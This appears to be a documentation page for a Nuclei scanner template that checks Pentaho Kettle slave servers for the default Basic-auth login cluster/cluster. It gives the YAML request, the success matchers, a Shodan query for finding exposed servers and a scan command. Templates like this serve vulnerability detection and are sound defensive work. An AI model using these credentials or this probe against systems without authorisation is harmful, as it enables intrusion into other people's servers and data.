Kettle - Default Login

ID: kettle-default-login

Severity: medium

Author: For3stCo1d

Tags: default-login,kettle

Description

Kettle contains a default login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.

YAML Source

id: kettle-default-login

info:
  name: Kettle - Default Login
  author: For3stCo1d
  severity: medium
  description: Kettle contains a default login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
    cvss-score: 5.8
    cwe-id: CWE-522
  metadata:
    verified: true
    max-request: 1
    shodan-query: basic realm="Kettle"
  tags: default-login,kettle

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic {{base64(username + ':' + password)}}

    attack: pitchfork
    payloads:
      username:
        - cluster
      password:
        - cluster

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Kettle slave server'

      - type: status
        status:
          - 200
# digest: 4a0a0047304502202b136eff39a0fe356deb6abd3a2b025e8626e9f778c61a2f07b585517b2a9317022100f822745a7c16f2081181478623451baad442d219bb569f96da25aff6e1351512:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/default-logins/kettle/kettle-default-login.yaml"

View on Github